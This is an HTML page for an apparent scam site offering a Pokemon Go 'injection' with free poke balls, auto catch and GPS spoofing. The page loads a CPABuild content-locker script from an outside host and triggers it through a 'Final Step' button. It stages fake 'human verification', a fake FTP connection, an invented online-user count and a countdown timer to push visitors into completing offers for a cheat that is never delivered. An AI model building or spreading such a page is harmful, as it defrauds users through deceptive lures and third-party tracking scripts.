﻿<script type="text/javascript">
    var CPABUILDSETTINGS={"it":3236015,"key":"b6f4c"};
</script>
<script src="https://d1j9qsxe04m2ki.cloudfront.net/e4c5ff5.js"></script>


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
	
<head>
		<title>Pokemon Go
		</title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
		<meta name="description" content="Pokemon Go  - iphonefull.com" />
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<link rel="icon" type="image/ico" href="img/favicon.html" />
		<!-- Icons -->
		<link rel="stylesheet" href="../../cdn.linearicons.com/free/1.0.0/icon-font.min.css">
		<link rel="stylesheet" href="../../use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
		<!-- Google Fonts -->
		<link href="../../fonts.googleapis.com/css093a.css?family=Poppins:300,400,700,900&amp;display=swap" rel="stylesheet">
		<!-- CSS -->
		<link href="css/bootstrap.min.css" rel="stylesheet" />
		<link href="css/animate.css" rel="stylesheet" />
		<link href="css/magnific-popup.css" rel="stylesheet" />
		<link href="css/style.css" rel="stylesheet" />
	</head>
	<body>

		<div style="display: none;" class="mfp-bg mfp-ready"></div>

		<div style="display: none;" class="mfp-wrap mfp-auto-cursor mfp-ready" tabindex="-1" style="overflow: hidden auto;"><div class="mfp-container mfp-inline-holder"><div class="mfp-content"><div id="master-modal" class="master-modal animated bounceIn"><div class="human-verification-wrapper">
			<div class="generator-container">
				<div class="generator-header">
					<span>Resources Injection</span>
				</div>
				<div class="generator-content">
					<div class="verification-app-wrapper">
						<img src="img/app-icon.png" class="verification-app-icon-img img-fluid">
						<h3><span>Pokemon Go</span> • Pokemon Go •</h3>
					</div>
					<p>Verification is required due to bot abuse on our servers. This is a free short process. Download will start after verification!</p>
					<i class="fas fa-spinner fa-spin"></i>
					<div id="h-v-time-left-wrapper" class="h-v-time-left-wrapper">
						<span>Time Left:</span>
						<span id="human_verification_timer_time"><span>30 minutes and 00 seconds</span></span>
					</div>
					<div class="button-wrapper">
										<a onclick="CPABuildLock()"><div id="b-1" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Final Step</span></div></a>
					</div>
				</div>
			</div>
		</div></div></div></div></div>

		<div class="modal fade" id="loadModal">
			<div class="modal-dialog modal-sm modal-dialog-centered">
				<div class="modal-load">
					<p class="big-title">Connecting...</p>
					<p class="small-title">FTP APP Data</p>
					<p>app-data.server</p>
					<div class="progress">
						<div class="progress-bar" style="width:4%"></div>
					</div>
				</div>
			</div>
		</div>

		<div class="modal fade animate" id="appModal">
			<div class="modal-dialog modal-dialog-centered">
				<div class="modal-content animate-bottom">
					<div class="modal-header">
						<button type="button" class="close" data-dismiss="modal">&times;</button>
						<div class="phone">
							<div class="icon-modal">
								<div class="avatar-modal"><img src="img/app-icon.png" alt="avatar"></div>
								<div class="name-modal">Pokemon Go</div>
							</div>
						</div>
					</div>
					<div class="modal-body">
						<h1>Injection required!</h1>
						<p>We need to install moded script on this application.<br /> Press button below to start!</p>
						<div class="modal-btn">
							<a class="btn-loadmodal soundclick btn-injection"><b>Start injection</b></a>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div id="bg"></div>
		<div class="overlay-pattern"></div>
		<div class="overlay"></div>
		<section class="app-download-section">
			<div class="container">
				<div class="app-download-wrapper animated flipInX">
					<div class="app-icon-wrapper">
						<div class="app-icon-inner-wrapper">
							<img src="img/app-icon.png" class="app-icon-img img-fluid" />
						</div>
					</div>
					<div class="app-download-content">
						<div class="app-download-content-header">
							<h1>Inject <span>Pokemon Go</span> • Free poke balls,auto catch,GPS •</h1>
						</div>
						<div class="app-download-status">
							<div class="status-row row-first animated bounceIn animation-delay-400">
								<span class="status-label">Status:</span>
								<span id="status" class="status-dynamic">Online</span>
							</div>
							<div class="status-row row-second odd animated bounceIn animation-delay-600">
								<span class="status-label">Last Update:</span>
								<span id="date" class="status-dynamic"></span>
							</div>
							<div class="status-row row-last animated bounceIn animation-delay-800">
								<span class="status-label">Online Users:</span>
								<span id="online-count" class="status-dynamic"></span>
							</div>
						</div>
						<div class="app-download-main firstPage animated bounceIn">
							<div class="button-wrapper">
								<div class="button btnGenerate animated pulse infinite"><span class="lnr lnr-download"></span><span>Start Injection</span></div>
							</div>
							<div style="margin-top: 30px;">
							</div>

						</div>
						<div class="app-download-main secondPage animated bounceIn" style="display: none;">
							<div class="animated bounceIn">
								<p class="app-download-intro-text">Select your device system.</p>
								<div class="field-wrapper platform-field-wrapper">
									<div class="row small-margin">
										<div class="col small-padding">
											<div class="soundclick platform-item platform-item-1">
												<i class="fab fa-android"></i>
												<span>Android</span>
											</div>
										</div>
										<div class="col small-padding">
											<div class="soundclick platform-item platform-item-2">
												<i class="fab fa-apple"></i>
												<span>iOS</span>
											</div>
										</div>
									</div>
								</div>
								<div class="button-wrapper">
									<div class="button soundclick startGenerator animated pulse infinite"><span class="lnr lnr-download"></span><span>Continue</span></div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</section>
		<footer>
			<div class="container">
				<div class="footer-content">
					<p>&copy; 2004-2022 • Ahmed M. Sawan •  Sawan Store starter</p>
				</div>
			</div>
		</footer>
	</body>
	<!-- JS -->
	<script type="text/javascript" src="../../ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
	<script type="text/javascript" src="js/bootstrap.min.js"></script>
	<script type="text/javascript" src="js/ion.sound.min.js"></script>
	<script type="text/javascript" src="js/custom.min.js"></script>
	<script type="text/javascript" src="dev.html">
</html>
